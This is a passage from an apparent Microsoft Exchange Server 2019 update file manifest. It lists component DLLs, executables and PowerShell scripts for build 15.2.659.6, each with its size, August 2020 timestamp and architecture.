\nMicrosoft.exchange.security.applicationencryption.dll| 15.2.659.6| 221,048| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.security.dll| 15.2.659.6| 1,558,400| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.security.msarpsservice.exe| 15.2.659.6| 19,840| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.security.securitymsg.dll| 15.2.659.6| 28,552| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.server.storage.admininterface.dll| 15.2.659.6| 225,160| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.common.dll| 15.2.659.6| 5,151,104| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.diagnostics.dll| 15.2.659.6| 214,912| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.server.storage.directoryservices.dll| 15.2.659.6| 115,576| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.esebackinterop.dll| 15.2.659.6| 82,824| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.server.storage.eventlog.dll| 15.2.659.6| 80,768| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.server.storage.fulltextindex.dll| 15.2.659.6| 66,440| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.ha.dll| 15.2.659.6| 81,288| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.lazyindexing.dll| 15.2.659.6| 211,848| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.logicaldatamodel.dll| 15.2.659.6| 1,341,312| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.mapidisp.dll| 15.2.659.6| 511,872| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.multimailboxsearch.dll| 15.2.659.6| 47,496| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.physicalaccess.dll| 15.2.659.6| 873,352| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.propertydefinitions.dll| 15.2.659.6| 1,352,072| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.propertytag.dll| 15.2.659.6| 30,592| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.server.storage.rpcproxy.dll| 15.2.659.6| 130,440| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.storecommonservices.dll| 15.2.659.6| 1,018,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.storeintegritycheck.dll| 15.2.659.6| 111,488| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.workermanager.dll| 15.2.659.6| 34,696| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.server.storage.xpress.dll| 15.2.659.6| 19,336| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.servicehost.eventlog.dll| 15.2.659.6| 14,728| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.servicehost.exe| 15.2.659.6| 60,800| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.dll| 15.2.659.6| 50,560| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.servicelets.globallocatorcache.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.servicelets.unifiedpolicysyncservicelet.eventlog.dll| 15.2.659.6| 14,216| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.services.common.dll| 15.2.659.6| 74,112| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.services.dll| 15.2.659.6| 8,494,464| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.services.eventlogs.dll| 15.2.659.6| 30,088| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.services.ewshandler.dll| 15.2.659.6| 633,728| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.services.ewsserialization.dll| 15.2.659.6| 1,651,080| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.services.json.dll| 15.2.659.6| 296,320| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.services.messaging.dll| 15.2.659.6| 43,392| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.services.onlinemeetings.dll| 15.2.659.6| 233,344| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.services.surface.dll| 15.2.659.6| 178,560| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.services.wcf.dll| 15.2.659.6| 348,552| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.acquirelanguagepack.dll| 15.2.659.6| 56,712| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.bootstrapper.common.dll| 15.2.659.6| 93,056| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.common.dll| 15.2.659.6| 296,320| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.commonbase.dll| 15.2.659.6| 35,720| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.setup.console.dll| 15.2.659.6| 27,008| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.setup.gui.dll| 15.2.659.6| 114,560| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.parser.dll| 15.2.659.6| 53,640| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.setup.signverfwrapper.dll| 15.2.659.6| 75,144| 12-Aug-2020| 21:27| x64 \nMicrosoft.exchange.sharedcache.caches.dll| 15.2.659.6| 142,720| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.sharedcache.client.dll| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.sharedcache.eventlog.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.sharedcache.exe| 15.2.659.6| 58,752| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.sharepointsignalstore.dll| 15.2.659.6| 27,016| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.slabmanifest.dll| 15.2.659.6| 46,976| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.sqm.dll| 15.2.659.6| 46,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.store.service.exe| 15.2.659.6| 28,024| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.store.worker.exe| 15.2.659.6| 26,504| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.storeobjectsservice.eventlog.dll| 15.2.659.6| 13,696| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.storeobjectsservice.exe| 15.2.659.6| 31,616| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.storeprovider.dll| 15.2.659.6| 1,205,120| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.structuredquery.dll| 15.2.659.6| 158,592| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.symphonyhandler.dll| 15.2.659.6| 628,104| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.syncmigration.eventlog.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.syncmigrationservicelet.dll| 15.2.659.6| 16,264| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.systemprobemsg.dll| 15.2.659.6| 13,192| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.textprocessing.dll| 15.2.659.6| 221,576| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.textprocessing.eventlog.dll| 15.2.659.6| 13,688| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.transport.agent.addressbookpolicyroutingagent.dll| 15.2.659.6| 29,064| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.antispam.common.dll| 15.2.659.6| 138,624| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.contentfilter.cominterop.dll| 15.2.659.6| 21,880| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.controlflow.dll| 15.2.659.6| 40,320| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.faultinjectionagent.dll| 15.2.659.6| 22,920| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.frontendproxyagent.dll| 15.2.659.6| 21,376| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.hygiene.dll| 15.2.659.6| 212,352| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.interceptoragent.dll| 15.2.659.6| 98,688| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.liveidauth.dll| 15.2.659.6| 22,920| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.malware.dll| 15.2.659.6| 169,344| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.malware.eventlog.dll| 15.2.659.6| 18,312| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.transport.agent.phishingdetection.dll| 15.2.659.6| 20,864| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.prioritization.dll| 15.2.659.6| 31,616| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.protocolanalysis.dbaccess.dll| 15.2.659.6| 46,984| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.agent.search.dll| 15.2.659.6| 30,088| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.senderid.core.dll| 15.2.659.6| 53,120| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.sharedmailboxsentitemsroutingagent.dll| 15.2.659.6| 44,936| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.systemprobedrop.dll| 15.2.659.6| 18,304| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.agent.transportfeatureoverrideagent.dll| 15.2.659.6| 46,456| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.agent.trustedmailagents.dll| 15.2.659.6| 46,456| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.cloudmonitor.common.dll| 15.2.659.6| 28,032| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.common.dll| 15.2.659.6| 457,096| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.contracts.dll| 15.2.659.6| 18,312| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.decisionengine.dll| 15.2.659.6| 30,592| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.dll| 15.2.659.6| 4,183,944| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.dsapiclient.dll| 15.2.659.6| 182,144| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.eventlog.dll| 15.2.659.6| 121,728| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.transport.extensibility.dll| 15.2.659.6| 403,848| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.extensibilityeventlog.dll| 15.2.659.6| 14,728| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.transport.flighting.dll| 15.2.659.6| 89,992| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.logging.dll| 15.2.659.6| 88,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.logging.search.dll| 15.2.659.6| 68,480| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.loggingcommon.dll| 15.2.659.6| 63,360| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.monitoring.dll| 15.2.659.6| 430,472| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.net.dll| 15.2.659.6| 122,248| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.protocols.contracts.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.protocols.dll| 15.2.659.6| 29,064| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.protocols.httpsubmission.dll| 15.2.659.6| 60,808| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.requestbroker.dll| 15.2.659.6| 50,056| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.scheduler.contracts.dll| 15.2.659.6| 33,160| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.scheduler.dll| 15.2.659.6| 113,032| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.smtpshared.dll| 15.2.659.6| 18,304| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.storage.contracts.dll| 15.2.659.6| 52,096| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.storage.dll| 15.2.659.6| 675,200| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.storage.management.dll| 15.2.659.6| 23,936| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.sync.agents.dll| 15.2.659.6| 17,792| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.sync.common.dll| 15.2.659.6| 487,296| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.sync.common.eventlog.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.transport.sync.manager.dll| 15.2.659.6| 306,048| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.transport.sync.manager.eventlog.dll| 15.2.659.6| 15,752| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.transport.sync.migrationrpc.dll| 15.2.659.6| 46,464| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.transport.sync.worker.dll| 15.2.659.6| 1,044,352| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.transport.sync.worker.eventlog.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.transportlogsearch.eventlog.dll| 15.2.659.6| 18,816| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.transportsyncmanagersvc.exe| 15.2.659.6| 18,816| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.um.troubleshootingtool.shared.dll| 15.2.659.6| 118,664| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.um.umcommon.dll| 15.2.659.6| 924,544| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.um.umcore.dll| 15.2.659.6| 1,466,760| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.um.umvariantconfiguration.dll| 15.2.659.6| 32,648| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.unifiedcontent.dll| 15.2.659.6| 41,856| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.unifiedcontent.exchange.dll| 15.2.659.6| 24,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.unifiedpolicyfilesync.eventlog.dll| 15.2.659.6| 15,224| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.unifiedpolicyfilesyncservicelet.dll| 15.2.659.6| 83,328| 12-Aug-2020| 21:27| x86 \nMicrosoft.exchange.unifiedpolicysyncservicelet.dll| 15.2.659.6| 50,040| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.antispam.dll| 15.2.659.6| 642,440| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.core.dll| 15.2.659.6| 186,240| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.dll| 15.2.659.6| 67,456| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.eventlog.dll| 15.2.659.6| 12,672| 12-Aug-2020| 21:25| x64 \nMicrosoft.exchange.variantconfiguration.excore.dll| 15.2.659.6| 56,704| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.globalsettings.dll| 15.2.659.6| 27,528| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.hygiene.dll| 15.2.659.6| 120,712| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.variantconfiguration.protectionservice.dll| 15.2.659.6| 31,624| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.variantconfiguration.threatintel.dll| 15.2.659.6| 57,216| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.webservices.auth.dll| 15.2.659.6| 35,712| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.webservices.dll| 15.2.659.6| 1,054,080| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.webservices.xrm.dll| 15.2.659.6| 67,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.wlmservicelet.dll| 15.2.659.6| 23,424| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.wopiclient.dll| 15.2.659.6| 77,184| 12-Aug-2020| 21:26| x86 \nMicrosoft.exchange.workingset.signalapi.dll| 15.2.659.6| 17,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.workingsetabstraction.signalapiabstraction.dll| 15.2.659.6| 29,056| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.workloadmanagement.dll| 15.2.659.6| 505,216| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.workloadmanagement.eventlogs.dll| 15.2.659.6| 14,720| 12-Aug-2020| 21:26| x64 \nMicrosoft.exchange.workloadmanagement.throttling.configuration.dll| 15.2.659.6| 36,744| 12-Aug-2020| 21:25| x86 \nMicrosoft.exchange.workloadmanagement.throttling.dll| 15.2.659.6| 66,432| 12-Aug-2020| 21:25| x86 \nMicrosoft.fast.contextlogger.json.dll| 15.2.659.6| 19,328| 12-Aug-2020| 21:25| x86 \nMicrosoft.filtering.dll| 15.2.659.6| 113,024| 12-Aug-2020| 21:25| x86 \nMicrosoft.filtering.exchange.dll| 15.2.659.6| 57,224| 12-Aug-2020| 21:25| x86 \nMicrosoft.filtering.interop.dll| 15.2.659.6| 15,232| 12-Aug-2020| 21:25| x86 \nMicrosoft.forefront.activedirectoryconnector.dll| 15.2.659.6| 46,976| 12-Aug-2020| 21:26| x86 \nMicrosoft.forefront.activedirectoryconnector.eventlog.dll| 15.2.659.6| 15,744| 12-Aug-2020| 21:26| x64 \nMicrosoft.forefront.filtering.common.dll| 15.2.659.6| 23,936| 12-Aug-2020| 21:26| x86 \nMicrosoft.forefront.filtering.diagnostics.dll| 15.2.659.6| 22,400| 12-Aug-2020| 21:25| x86 \nMicrosoft.forefront.filtering.eventpublisher.dll| 15.2.659.6| 34,696| 12-Aug-2020| 21:27| x86 \nMicrosoft.forefront.management.powershell.format.ps1xml| Not applicable| 48,902| 12-Aug-2020| 21:26| Not applicable \nMicrosoft.forefront.management.powershell.types.ps1xml| Not applicable| 16,278| 12-Aug-2020| 21:25| Not applicable \nMicrosoft.forefront.monitoring.activemonitoring.local.components.dll| 15.2.659.6| 1,518,984| 12-Aug-2020| 21:25| x86 \nMicrosoft.forefront.monitoring.activemonitoring.local.components.messages.dll| 15.2.659.6| 13,184| 12-Aug-2020| 21:25| x64 \nMicrosoft.forefront.monitoring.management.outsidein.dll| 15.2.659.6| 33,160| 12-Aug-2020| 21:26| x86 \nMicrosoft.forefront.recoveryactionarbiter.contract.dll| 15.2.659.6| 18,296| 12-Aug-2020| 21:25| x86 \nMicrosoft.forefront.reporting.common.dll| 15.2.659.6| 46,456| 12-Aug-2020| 21:25| x86 \nMicrosoft.forefront.reporting.ondemandquery.dll| 15.2.659.6| 50,568| 12-Aug-2020| 21:25| x86 \nMicrosoft.isam.esent.collections.dll| 15.2.659.6| 72,576| 12-Aug-2020| 21:27| x86 \nMicrosoft.isam.esent.interop.dll| 15.2.659.6| 541,576| 12-Aug-2020| 21:26| x86 \nMicrosoft.managementgui.dll| 15.2.659.6| 133,504| 12-Aug-2020| 21:25| x86 \nMicrosoft.mce.interop.dll| 15.2.659.6| 24,448| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.audit.dll| 15.2.659.6| 124,800| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.client.discovery.unifiedexport.dll| 15.2.659.6| 593,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.common.ipcommonlogger.dll| 15.2.659.6| 42,360| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.compliance.console.core.dll| 15.2.659.6| 217,992| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.compliance.console.dll| 15.2.659.6| 854,912| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.compliance.console.extensions.dll| 15.2.659.6| 485,768| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.compliance.core.dll| 15.2.659.6| 413,056| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.compliance.ingestion.dll| 15.2.659.6| 36,224| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.compliancepolicy.exchange.dar.dll| 15.2.659.6| 84,856| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.compliancepolicy.platform.dll| 15.2.659.6| 1,782,152| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.datacenter.activemonitoring.management.common.dll| 15.2.659.6| 49,536| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.datacenter.activemonitoring.management.dll| 15.2.659.6| 27,512| 12-Aug-2020| 21:26| x86 \nMicrosoft.office.datacenter.activemonitoringlocal.dll| 15.2.659.6| 174,976| 12-Aug-2020| 21:25| x86 \nMicrosoft.office.datacenter.monitoring.activemonitoring.recovery.dll| 15.2.659.6| 166,280| 12-Aug-2020| 21:25| x86 \nMicrosoft.office365.datainsights.uploader.dll| 15.2.659.6| 40,320| 12-Aug-2020| 21:25| x86 \nMicrosoft.online.box.shell.dll| 15.2.659.6| 46,464| 12-Aug-2020| 21:25| x86 \nMicrosoft.powershell.hostingtools.dll| 15.2.659.6| 67,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.powershell.hostingtools_2.dll| 15.2.659.6| 67,968| 12-Aug-2020| 21:25| x86 \nMicrosoft.tailoredexperiences.core.dll| 15.2.659.6| 120,192| 12-Aug-2020| 21:25| x86 \nMigrateumcustomprompts.ps1| Not applicable| 19,110| 12-Aug-2020| 21:26| Not applicable \nModernpublicfoldertomailboxmapgenerator.ps1| Not applicable| 29,052| 12-Aug-2020| 21:26| Not applicable \nMovemailbox.ps1| Not applicable| 61,116| 12-Aug-2020| 21:26| Not applicable \nMovetransportdatabase.ps1| Not applicable| 30,590| 12-Aug-2020| 21:26| Not applicable \nMove_publicfolderbranch.ps1| Not applicable| 17,520| 12-Aug-2020| 21:26| Not applicable \nMpgearparser.dll| 15.2.659.6| 99,720| 12-Aug-2020| 21:26| x64 \nMsclassificationadapter.dll| 15.2.659.6| 248,712| 12-Aug-2020| 21:28| x64 \nMsexchangecompliance.exe| 15.2.659.6| 78,728| 12-Aug-2020| 21:25| x86 \nMsexchangedagmgmt.exe| 15.2.659.6| 25,472| 12-Aug-2020| 21:25| x86 \nMsexchangedelivery.exe| 15.2.659.6| 38,784| 12-Aug-2020| 21:25| x86 \nMsexchangefrontendtransport.exe| 15.2.659.6| 31,616| 12-Aug-2020| 21:27| x86 \nMsexchangehmhost.exe| 15.2.659.6| 27,008| 12-Aug-2020| 21:25| x86 \nMsexchangehmrecovery.exe| 15.2.659.6| 29,576| 12-Aug-2020| 21:25| x86 \nMsexchangemailboxassistants.exe| 15.2.659.6| 72,584| 12-Aug-2020| 21:25| x86 \nMsexchangemailboxreplication.exe| 15.2.659.6| 20,864| 12-Aug-2020| 21:27| x86 \nMsexchangemigrationworkflow.exe| 15.2.659.6| 69,000| 12-Aug-2020| 21:25| x86 \nMsexchangerepl.exe| 15.2.659.6| 71,040| 12-Aug-2020| 21:25| x86 \nMsexchangesubmission.exe| 15.2.659.6| 123,264| 12-Aug-2020| 21:27| x86 \nMsexchangethrottling.exe| 15.2.659.6| 39,808| 12-Aug-2020| 21:25| x86 \nMsexchangetransport.exe| 15.2.659.6| 74,112| 12-Aug-2020| 21:27| x86 \nMsexchangetransportlogsearch.exe| 15.2.659.6| 139,136| 12-Aug-2020| 21:26| x86 \nMsexchangewatchdog.exe| 15.2.659.6| 55,680| 12-Aug-2020| 21:25| x64 \nMspatchlinterop.dll| 15.2.659.6| 53,640| 12-Aug-2020| 21:27| x64 \nNativehttpproxy.dll| 15.2.659.6| 91,520| 12-Aug-2020| 21:25| x64 \nNavigatorparser.dll| 15.2.659.6| 636,800| 12-Aug-2020| 21:26| x64 \nNego2nativeinterface.dll| 15.2.659.6| 19,328| 12-Aug-2020| 21:25| x64 \nNegotiateclientcertificatemodule.dll| 15.2.659.6| 30,080| 12-Aug-2020| 21:25| x64 \nNewtestcasconnectivityuser.ps1| Not applicable| 19,752| 12-Aug-2020| 21:27| Not applicable \nNewtestcasconnectivityuserhosting.ps1| Not applicable| 24,567| 12-Aug-2020| 21:26| Not applicable \nNtspxgen.dll| 15.2.659.6| 80,768| 12-Aug-2020| 21:25| x64 \nOleconverter.exe| 15.2.659.6| 173,960| 12-Aug-2020| 21:26| x64 \nOutsideinmodule.dll| 15.2.659.6| 87,944| 12-Aug-2020| 21:26| x64 \nOwaauth.dll| 15.2.659.6| 92,032| 12-Aug-2020| 21:25| x64 \nPerf_common_extrace.dll| 15.2.659.6| 245,128| 12-Aug-2020| 21:25| x64 \nPerf_exchmem.dll| 15.2.659.6| 86,408| 12-Aug-2020| 21:26| x64 \nPipeline2.dll| 15.2.659.6| 1,454,472| 12-Aug-2020| 21:25| x64 \nPreparemoverequesthosting.ps1| Not applicable| 70,983| 12-Aug-2020| 21:26| Not applicable \nPrepare_moverequest.ps1| Not applicable| 73,217| 12-Aug-2020| 21:26| Not applicable \nProductinfo.managed.dll| 15.2.659.6| 27,008| 12-Aug-2020| 21:25| x86 \nProxybinclientsstringsdll| 15.2.659.6| 924,544| 12-Aug-2020| 21:26| x86 \nPublicfoldertomailboxmapgenerator.ps1| Not applicable| 23,226| 12-Aug-2020| 21:26| Not applicable \nQuietexe.exe| 15.2.659.6| 14,728| 12-Aug-2020| 21:25| x86 \nRedistributeactivedatabases.ps1| Not applicable| 250,572| 12-Aug-2020| 21:26| Not applicable \nReinstalldefaulttransportagents.ps1| Not applicable| 21,643| 12-Aug-2020| 21:25| Not applicable \nRemoteexchange.ps1| Not applicable| 23,561| 12-Aug-2020| 21:25| Not applicable \nRemoveuserfrompfrecursive.ps1| Not applicable| 14,672| 12-Aug-2020| 21:26| Not applicable \nReplaceuserpermissiononpfrecursive.ps1| Not applicable| 14,990| 12-Aug-2020| 21:26| Not applicable \nReplaceuserwithuseronpfrecursive.ps1| Not applicable| 15,000| 12-Aug-2020| 21:27| Not applicable \nReplaycrimsonmsg.dll| 15.2.659.6| 1,104,776| 12-Aug-2020| 21:25| x64 \nResetattachmentfilterentry.ps1| Not applicable| 15,464| 12-Aug-2020| 21:25| Not applicable \nResetcasservice.ps1| Not applicable| 21,695| 12-Aug-2020| 21:26| Not applicable \nReset_antispamupdates.ps1| Not applicable| 14,089| 12-Aug-2020| 21:26| Not applicable \nRestoreserveronprereqfailure.ps1| Not applicable| 15,129| 12-Aug-2020| 21:27| Not applicable \nResumemailboxdatabasecopy.ps1| Not applicable| 17,198| 12-Aug-2020| 21:25| Not applicable \nRightsmanagementwrapper.dll| 15.2.659.6| 86,400| 12-Aug-2020| 21:27| x64 \nRollalternateserviceaccountpassword.ps1| Not applicable| 55,778| 12-Aug-2020| 21:27| Not applicable \nRpcperf.dll| 15.2.659.6| 23,424| 12-Aug-2020| 21:25| x64 \nRpcproxyshim.dll| 15.2.659.6| 39,296| 12-Aug-2020| 21:26| x64 \nRulesauditmsg.dll| 15.2.659.6| 12,680| 12-Aug-2020| 21:27| x64 \nSafehtmlnativewrapper.dll| 15.2.659.6| 34,696| 12-Aug-2020| 21:26| x64 \nScanenginetest.exe| 15.2.659.6| 956,296| 12-Aug-2020| 21:26| x64 \nScanningprocess.exe| 15.2.659.6| 739,208| 12-Aug-2020| 21:26| x64 \nSearchdiagnosticinfo.ps1| Not applicable| 16,800| 12-Aug-2020| 21:27| Not applicable \nServicecontrol.ps1| Not applicable| 52,317| 12-Aug-2020| 21:26| Not applicable \nSetmailpublicfolderexternaladdress.ps1| Not applicable| 20,742| 12-Aug-2020| 21:26| Not applicable \nSettingsadapter.dll| 15.2.659.6| 116,096| 12-Aug-2020| 21:26| x64 \nSetup.exe| 15.2.659.6| 20,352| 12-Aug-2020| 21:25| x86 \nSetupui.exe| 15.2.659.6| 188,288| 12-Aug-2020| 21:25| x86 \nSplit_publicfoldermailbox.ps1| Not applicable| 52,177| 12-Aug-2020| 21:26| Not applicable \nStartdagservermaintenance.ps1| Not applicable| 27,851| 12-Aug-2020| 21:26| Not applicable \nStatisticsutil.dll| 15.2.659.6| 142,216| 12-Aug-2020| 21:25| x64 \nStopdagservermaintenance.ps1| Not applicable| 21,121| 12-Aug-2020| 21:25| Not applicable \nStoretsconstants.ps1| Not applicable| 15,818| 12-Aug-2020| 21:26| Not applicable \nStoretslibrary.ps1| Not applicable| 27,991| 12-Aug-2020| 21:26| Not applicable \nStore_mapi_net_bin_perf_x64_exrpcperf.dll| 15.2.659.6| 28,552| 12-Aug-2020| 21:26| x64 \nSync_mailpublicfolders.ps1| Not applicable| 43,915| 12-Aug-2020| 21:26| Not applicable \nSync_modernmailpublicfolders.ps1| Not applicable| 43,961| 12-Aug-2020| 21:26| Not applicable \nTextconversionmodule.dll| 15.2.659.6| 86,408| 12-Aug-2020| 21:26| x64 \nTroubleshoot_ci.ps1| Not applicable| 22,715| 12-Aug-2020| 21:27| Not applicable \nTroubleshoot_databaselatency.ps1| Not applicable| 33,421| 12-Aug-2020| 21:26| Not applicable \nTroubleshoot_databasespace.ps1| Not applicable| 30,017| 12-Aug-2020| 21:26| Not applicable \nUninstall_antispamagents.ps1| Not applicable| 15,477| 12-Aug-2020| 21:26| Not applicable \nUpdateapppoolmanagedframeworkversion.ps1| 